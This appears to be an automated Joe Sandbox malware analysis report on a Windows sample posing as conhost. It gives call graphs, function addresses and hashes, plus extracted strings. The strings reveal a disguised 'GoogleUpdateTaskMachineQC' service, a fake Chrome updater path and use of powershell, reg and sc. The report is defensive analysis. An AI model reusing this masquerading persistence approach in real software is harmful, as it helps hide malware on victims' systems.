1400015d5 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015e4 2660->2661 2662 140001394 2 API calls 2661->2662 2663 1400015f3 2662->2663 2663->2255 2665 140001394 2 API calls 2664->2665 2666 1400015b7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015c6 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015d5 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015e4 2671->2672 2673 140001394 2 API calls 2672->2673 2674 1400015f3 2673->2674 2674->2255 2676 140001394 2 API calls 2675->2676 2677 140001530 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000153f 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000154e 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000155d 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000156c 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000157b 2686->2687 2688 140001394 2 API calls 2687->2688 2689 14000158a 2688->2689 2690 140001394 2 API calls 2689->2690 2691 140001599 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015a8 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015b7 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015c6 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015d5 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015e4 2700->2701 2702 140001394 2 API calls 2701->2702 2703 1400015f3 2702->2703 2703->2255 2705 140001394 2 API calls 2704->2705 2706 140001431 2705->2706 2707 140001394 2 API calls 2706->2707 2708 140001440 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000144f 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000145e 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000146d 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000147c 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000148b 2717->2718 2719 140001394 2 API calls 2718->2719 2720 14000149a 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014a9 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014b8 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014c7 2725->2726 2727 140001394 2 API calls 2726->2727 2728 1400014d6 2727->2728 2729 1400014e5 2728->2729 2730 140001394 2 API calls 2728->2730 2731 140001394 2 API calls 2729->2731 2730->2729 2732 1400014ef 2731->2732 2733 1400014f4 2732->2733 2734 140001394 2 API calls 2732->2734 2735 140001394 2 API calls 2733->2735 2734->2733 2736 1400014fe 2735->2736 2737 140001503 2736->2737 2738 140001394 2 API calls 2736->2738 2739 140001394 2 API calls 2737->2739 2738->2737 2740 14000150d 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001512 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001521 2743->2744 2745 140001394 2 API calls 2744->2745 2746 140001530 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000153f 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000154e 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000155d 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000156c 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000157b 2755->2756 2757 140001394 2 API calls 2756->2757 2758 14000158a 2757->2758 2759 140001394 2 API calls 2758->2759 2760 140001599 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015a8 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015b7 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015c6 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015d5 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015e4 2769->2770 2771 140001394 2 API calls 2770->2771 2772 1400015f3 2771->2772 2772->2255 2774 140001394 2 API calls 2773->2774 2775 140001440 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000144f 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000145e 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000146d 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000147c 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000148b 2784->2785 2786 140001394 2 API calls 2785->2786 2787 14000149a 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014a9 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014b8 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014c7 2792->2793 2794 140001394 2 API calls 2793->2794 2795 1400014d6 2794->2795 2796 1400014e5 2795->2796 2797 140001394 2 API calls 2795->2797 2798 140001394 2 API calls 2796->2798 2797->2796 2799 1400014ef 2798->2799 2800 1400014f4 2799->2800 2801 140001394 2 API calls 2799->2801 2802 140001394 2 API calls 2800->2802 2801->2800 2803 1400014fe 2802->2803 2804 140001503 2803->2804 2805 140001394 2 API calls 2803->2805 2806 140001394 2 API calls 2804->2806 2805->2804 2807 14000150d 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001512 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001521 2810->2811 2812 140001394 2 API calls 2811->2812 2813 140001530 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000153f 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000154e 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000155d 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000156c 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000157b 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000158a 2824->2825 2826 140001394 2 API calls 2825->2826 2827 140001599 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015a8 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015b7 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015c6 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015d5 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015e4 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015f3 2838->2839 2839->2255

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00000001400056E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 75 Function_0000000140001BA0 1->75 2 Function_00000001400014E5 71 Function_0000000140001394 2->71 3 Function_00000001400010F0 4 Function_00000001400014F4 4->71 5 Function_0000000140001800 66 Function_0000000140002290 5->66 6 Function_0000000140002500 7 Function_0000000140001000 8 Function_0000000140001E00 7->8 41 Function_0000000140001750 7->41 79 Function_0000000140001FB0 7->79 87 Function_0000000140001FC0 7->87 9 Function_0000000140002F00 59 Function_0000000140001370 9->59 10 Function_0000000140005D00 34 Function_0000000140005A40 10->34 11 Function_0000000140003101 12 Function_0000000140005701 13 Function_0000000140005801 14 Function_0000000140001503 14->71 15 Function_0000000140001404 15->71 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140001512 18->71 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140003120 22 Function_0000000140005A20 23 Function_0000000140001521 23->71 24 Function_0000000140005721 25 Function_0000000140005821 26 Function_0000000140001422 26->71 27 Function_0000000140001530 27->71 28 Function_0000000140005830 29 Function_0000000140001431 29->71 30 Function_0000000140005931 31 Function_000000014000153F 31->71 32 Function_0000000140003140 33->66 35 Function_0000000140001440 35->71 36 Function_0000000140001140 50 Function_0000000140001160 36->50 37 Function_0000000140005741 38 Function_0000000140001F47 60 Function_0000000140001870 38->60 39 Function_0000000140002050 40 Function_0000000140005A50 40->34 42 Function_0000000140001650 43 Function_0000000140003051 44 Function_0000000140005851 45 Function_000000014000155D 45->71 46 Function_000000014000145E 46->71 47 Function_0000000140002460 48 Function_0000000140002660 49 Function_0000000140003160 49->9 49->14 49->23 49->26 49->27 49->29 49->31 49->34 49->35 49->46 49->48 55 Function_000000014000156C 49->55 56 Function_000000014000146D 49->56 49->59 62 Function_000000014000157B 49->62 76 Function_00000001400015A8 49->76 77 Function_00000001400014A9 49->77 86 Function_00000001400016C0 49->86 97 Function_00000001400014D6 49->97 99 Function_00000001400026E0 49->99 50->49 50->50 50->60 63 Function_0000000140001880 50->63 65 Function_0000000140001F90 50->65 50->86 51 Function_0000000140001760 100 Function_00000001400020E0 51->100 52 Function_0000000140005761 53 Function_0000000140005961 54 Function_0000000140001E65 54->60 55->71 56->71 57 Function_000000014000216F 58 Function_0000000140001A70 58->33 58->75 61 Function_0000000140003070 62->71 63->19 63->33 63->48 63->75 64 Function_0000000140005881 67 Function_0000000140002590 68 Function_0000000140003090 69 Function_0000000140002691 70 Function_0000000140005791 71->10 71->40 72 Function_0000000140002194 72->60 73 Function_000000014000219E 74 Function_0000000140001FA0 75->33 78 Function_00000001400023B0 75->78 91 Function_00000001400024D0 75->91 76->71 77->71 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400057B1 84 Function_00000001400059B1 85 Function_0000000140001AB3 85->33 85->75 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->33 89->75 90 Function_00000001400014C7 90->71 92 Function_00000001400017D0 93 Function_0000000140001FD0 94 Function_00000001400026D0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->33 96->75 97->71 98 Function_00000001400022E0 99->2 99->4 99->14 99->18 99->34 99->45 99->46 99->48 99->59 99->77 99->90 101 Function_00000001400017E0 101->100

                                          Executed Functions

                                          Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • NtSetTimer2.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Timer2
                                          • String ID:
                                          • API String ID: 3765539487-0
                                          • Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                          • Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
                                          • Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                          • Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

                                          Non-executed Functions

                                          Function 0000000140003160 Relevance: 85.6, APIs: 38, Strings: 18, Instructions: 1606COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpy
                                          • String ID: $ $ImagePath$PROGRAMDATA=$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\irgetnfcwnlzcjjx$\BaseNamedObjects\nbpdgpttumpbrvsggtyhzzki$\BaseNamedObjects\oihkhofwnelue$\Google\Chrome\updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
                                          • API String ID: 295340062-1204649063
                                          • Opcode ID: 84489d52dc6eabb1d20f0ef85d9b4e50c601852e4457ff161c3aa2df161eabe2
                                          • Instruction ID: 63998e305b8756a5e3452f834d5d1cbc286363a7c0fb3ee0574469475c343858
                                          • Opcode Fuzzy Hash: 84489d52dc6eabb1d20f0ef85d9b4e50c601852e4457ff161c3aa2df161eabe2
                                          • Instruction Fuzzy Hash: B02329F1524BC198F723CB2AF8467E56360BB9E3C8F445215FB84676B6EB798285C304
                                          Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 317 140002774-14000277a 315->317 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 317->316 319 140002780-140002787 317->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 328 140002794-1400027ab 321->328 329 1400027f8-1400027fb 321->329 327 14000275a-14000276e 322->327 340 140002986-1400029c8 call 140001503 call 140005a40 323->340 341 14000297d 323->341 325 140002eb7-140002ef4 call 140001370 324->325 326 140002879-140002888 324->326 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->317 334 1400027f5 328->334 335 1400027ad-1400027c2 328->335 329->327 331->323 332->331 334->329 339 1400027d0-1400027d7 335->339 342 1400027d9-1400027f3 339->342 343 140002800-140002809 339->343 349 140002e49-140002e84 call 140001370 340->349 350 1400029ce-1400029d5 340->350 341->340 342->334 342->339 343->327 352 1400029d7-140002a0c 349->352 357 140002e8a 349->357 351 140002a13-140002a43 wcscpy wcscat wcslen 350->351 350->352 354 140002a45-140002a76 wcslen 351->354 355 140002a78-140002aa5 351->355 352->351 358 140002aa8-140002abf wcslen 354->358 355->358 357->351 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                          • String ID: 0$X$\BaseNamedObjects\nbpdgpttumpbrvsggtyhzzki$`
                                          • API String ID: 597572034-1884934463
                                          • Opcode ID: 97d98fd1f8f26b2f6adaa190693670e5aa8e9adce9169d4d44e2208dc3c15a9e
                                          • Instruction ID: 7ef851f8f8bfc735060d7e834e9c65a72f2dfc4ff847d9955ee94b9ea182b1ed
                                          • Opcode Fuzzy Hash: 97d98fd1f8f26b2f6adaa190693670e5aa8e9adce9169d4d44e2208dc3c15a9e
                                          • Instruction Fuzzy Hash: 011259B2608B8081E762CB16F8443EAB7A4F789794F414215EBA957BF5DF7CC189C700
                                          Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID:
                                          • API String ID: 2643109117-0
                                          • Opcode ID: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                          • Instruction ID: 463d8eadf6764cf81835e2f5447ee9fd2fbaf236c41788732bd38f3ca502ba48
                                          • Opcode Fuzzy Hash: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                          • Instruction Fuzzy Hash: 5A5123B1611A4085FB16EF27F9947EA27A5AB8D7D0F849121FB4D873B6DE38C4958300
                                          Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 437 140001cf4-140001cfe call 140001d40 430->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->438 433 140001bf3-140001c02 431->433 434 140001be0-140001be7 431->434 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                          • Instruction ID: 5c7ee5ee1b8a04923d5a96a0df04d384374ee326a967495c8333b08c7993e382
                                          • Opcode Fuzzy Hash: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                          • Instruction Fuzzy Hash: 294143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                          Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 926137887-0
                                          • Opcode ID: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                          • Instruction ID: 85fbb11ae3983d049e5aa99e15e4bef804ab9b98c2283f83d64eac87ba6817d4
                                          • Opcode Fuzzy Hash: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                          • Instruction Fuzzy Hash: 9221E3B0705A0292FA5BEB53F9583E92360B76CBD0F444021FB1E476B4DB7A8986C300
                                          Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 474 140001e10-140001e2d 475 140001e3e-140001e48 474->475 476 140001e2f-140001e38 474->476 478 140001ea3-140001ea8 475->478 479 140001e4a-140001e53 475->479 476->475 477 140001f60-140001f69 476->477 478->477 482 140001eae-140001eb3 478->482 480 140001e55-140001e60 479->480 481 140001ecc-140001ed1 479->481 480->478 485 140001f23-140001f2d 481->485 486 140001ed3-140001ee2 signal 481->486 483 140001eb5-140001eba 482->483 484 140001efb-140001f0a call 140005ff0 482->484 483->477 491 140001ec0 483->491 484->485 495 140001f0c-140001f10 484->495 489 140001f43-140001f45 485->489 490 140001f2f-140001f3f 485->490 486->485 487 140001ee4-140001ee8 486->487 492 140001eea-140001ef9 signal 487->492 493 140001f4e-140001f53 487->493 489->477 490->489 491->485 492->477 496 140001f5a 493->496 497 140001f12-140001f21 signal 495->497 498 140001f55 495->498 496->477 497->477 498->496
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                          • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                          • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                          • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241
                                          Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 499 140001880-14000189c 500 1400018a2-1400018f9 call 140002420 call 140002660 499->500 501 140001a0f-140001a1f 499->501 500->501 506 1400018ff-140001910 500->506 507 140001912-14000191c 506->507 508 14000193e-140001941 506->508 509 14000194d-140001954 507->509 510 14000191e-140001929 507->510 508->509 511 140001943-140001947 508->511 514 140001956-140001961 509->514 515 14000199e-1400019a6 509->515 510->509 512 14000192b-14000193a 510->512 511->509 513 140001a20-140001a26 511->513 512->508 516 140001b87-140001b98 call 140001d40 513->516 517 140001a2c-140001a37 513->517 518 140001970-14000199c call 140001ba0 514->518 515->501 519 1400019a8-1400019c1 515->519 517->515 520 140001a3d-140001a5f 517->520 518->515 523 1400019df-1400019e7 519->523 526 140001a7d-140001a97 520->526 524 1400019e9-140001a0d VirtualProtect 523->524 525 1400019d0-1400019dd 523->525 524->525 525->501 525->523 529 140001b74-140001b82 call 140001d40 526->529 530 140001a9d-140001afa 526->530 529->516 536 140001b22-140001b26 530->536 537 140001afc-140001b0e 530->537 540 140001b2c-140001b30 536->540 541 140001a70-140001a77 536->541 538 140001b5c-140001b6c 537->538 539 140001b10-140001b20 537->539 538->529 543 140001b6f call 140001d40 538->543 539->536 539->538 540->541 542 140001b36-140001b57 call 140001ba0 540->542 541->515 541->526 542->538 543->529
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                          Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 547 140001800-140001810 548 140001812-140001822 547->548 549 140001824 547->549 550 14000182b-140001867 call 140002290 fprintf 548->550 549->550
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                          • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                          • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                          • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310
                                          Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
